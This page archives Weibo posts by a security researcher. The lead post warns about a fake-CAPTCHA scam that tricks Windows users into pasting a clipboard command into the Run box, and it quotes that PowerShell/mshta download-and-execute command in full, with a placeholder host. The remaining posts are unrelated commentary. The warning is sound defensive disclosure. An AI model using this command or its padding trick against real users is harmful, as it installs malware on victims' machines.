• 邮件反馈
  • 支持 TK
  • 微博

    • 看看最新
    • 随便看看
    • 过去一周
    • 过去一年
  • 精选

    • 净想好事
    • 安全合辑
    • 疫苗合辑
    • 读书合辑
  • 文档

    • 搜索说明
    • 百元好物
    • tk猴子

  • 支持
上个页面看看最新
下个页面过去一周

© Copyright 2025. All rights reserved.

加入tk真爱粉群
t0mbkeeper

2025-02-13 16:52

现在黑产有一种新的社交工程学挂马方案。

你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。

你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:

powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。

图三显然是一个受害者。

阅读全文 >
tombkeeper

2021-06-05 10:51

林云的量子玫瑰在绽放[微笑] //@于三羊鲜声: 转发微博

寰亚SYHP

2021-06-05 10:31

昨晚山东济南,有网友拍到了形状奇特的闪电画面 🔗寰亚SYHP的微博视频

阅读全文 >
阅读全文 >
tombkeeper

2021-08-21 05:21

做了个梦,梦见是对面在使坏,在忽悠,为了创造砝码。

tombkeeper

2021-07-26 11:59

A 股随之而跌,这当然不好。但这也可能成为对面那个托盘里的一个砝码。不知道这个砝码够不够大。我觉得不够。

阅读全文 >
阅读全文 >
tombkeeper

2020-10-26 11:27

终于有了新业务!

阅读全文 >
tombkeeper

2023-10-05 14:02

和所有事物一样,摇滚入华也必然接受改造,成为社会主义摇滚,简称社会摇。 🔗评论配图

汪有

2023-10-05 12:45

迷笛音乐节很好地示范了:我国摇滚圈没有什么社会危害。摇滚说是蔑视规则我行我素,嘴上说得都挺狠,但遇到事儿了大家也都是遵纪守法走正常渠道投诉维权。他们是最拥抱文明社会的一群人。别一天天瞎管了。
按说现在买房才是最摇滚。

阅读全文 >
阅读全文 >
1
...
4785.44786.4
4787.4
4788.44789.4
...
6256